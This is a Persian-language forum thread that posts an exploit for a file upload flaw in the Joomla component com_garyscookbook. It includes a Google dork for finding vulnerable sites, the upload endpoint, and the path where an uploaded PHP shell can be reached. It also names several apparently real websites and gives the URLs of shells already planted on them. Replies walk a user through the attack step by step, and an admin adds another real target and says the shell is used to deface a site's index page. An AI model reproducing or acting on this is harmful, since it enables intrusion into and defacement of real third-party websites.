رفتن به مطلب

ارسال های توصیه شده


# Exploit Title: joomla com_garyscookbook file upload

# Dork Google: "inurl:com_garyscookbook"

poc:

localhost/path/index.php?option=com_garyscookbook&func=newItem

###########################

upload shell php and go 2 :

localhost/path/components/com_garyscookbook/img_pictures/shell.php

############################

1) http://www.kouzinapapanagiotou.gr/index.php?option=com_garyscookbook&func=newItem

http://www.kouzinapapanagiotou.gr//components/com_garyscookbook/img_pictures/dz-hp-0.php

2) http://oneiron.gr/index.php?option=com_garyscookbook&func=newItem

http://oneiron.gr/components/com_garyscookbook/img_pictures/dzdz-hp-0.php

3 ) https://www.vitamix.co.uk/index.php?option=com_garyscookbook&func=newItem

https://www.vitamix.co.uk//components/com_garyscookbook/img_pictures/help.php

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

  • 1 ماه بعد...

سلام. ببخشید این همه سوال دارم ولی میخوام بدونم نحوه کار با این اکسپلویت چی هست؟ مثلا poc یعنی چی؟ یا اون سه گزینه آخر چین. یا چرا به جای آدرس localhost نوشتید.

 

سلام یک اینکه در تاپیک های آموزشی سوال نپرسید.

 

خوب.این نکته رو هم ذکر کنم که اکسپلویت ها به محض ریپورت پچ میشن و دیگه کاربردی ندارن چه برسه به اینکه مال خیلی وقت پیشه.

 

خوب روش استفاده:

 

ابتدا گوگل دورک رو سرچ میکنید:

 

"inurl:com_garyscookbook"

 

سپس یک تارگت رو انتخاب میکنید و سپس این اکسپلویت رو بهش اضافه میکنید

 

/index.php?option=com_garyscookbook&func=newItem

 

خوب حالا اگر باگ پچ نشده باشه یک آپلودر برای شما میاره و اگر پچ شده باشه چیزی نمیاد.

 

خوب حالا شل ما به مسیر زیر میرود:

 

/components/com_garyscookbook/img_pictures/shell.php

 

----------

 

خوب حالا ما localhost رو به عنوان url سایت در نظر میگیریم(یک مثل فرضی هست)

موفق باشید

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

  • 1 سال بعد...
  • مدیر کل
در 10 دقیقه قبل، Worst_boy0 گفته است :

یعنی هک نمیشه. همش الکیه

؟

دوست عزیز زیر آموزش کسی سوال نمیپرسه یا به صورت خصوصی سوال کنید یا تو بخش سوالات بپرسید

قدم اول شما اینه که شل آپلود کنید تو سایت وقتی شل رو آپلود کردی میتونی ایندکس سایتو عوض کنی

http://5przemian.pl//index.php?option=com_garyscookbook&func=newItem

کارهایی رو که گفتن قدم به قدم انجام بدید و اگر به مشکل خوردید به من پیام بدید

هر باگی یک طول عمری داره و بعد مدتی پچ میشه (یعنی دیگه اون باگ وجود نداره و رفع شده)

ولی آخرش بعضی سایتها هنوز باگ رو دارن ولی باید بگردید تا سایتی که با این روش هک بشه رو پیدا کنید

و باز هم تاکید میکنم در پست آموزشی سوال نپرسید

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری
 اشتراک گذاری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شرکت گاردایران

پردازشگران ایمن داده ي آدلان

شماره ثبت: 9438

شبکه های اجتماعی

 

نمادها

logo.aspx?id=56084&Code=ybjZVyBlXag5cNRv logo-samandehi

×
×
  • اضافه کردن...

اطلاعات مهم

فعالیت شما در این انجمن به منزله تایید قوانین انجمن میباشد! شرایط استفاده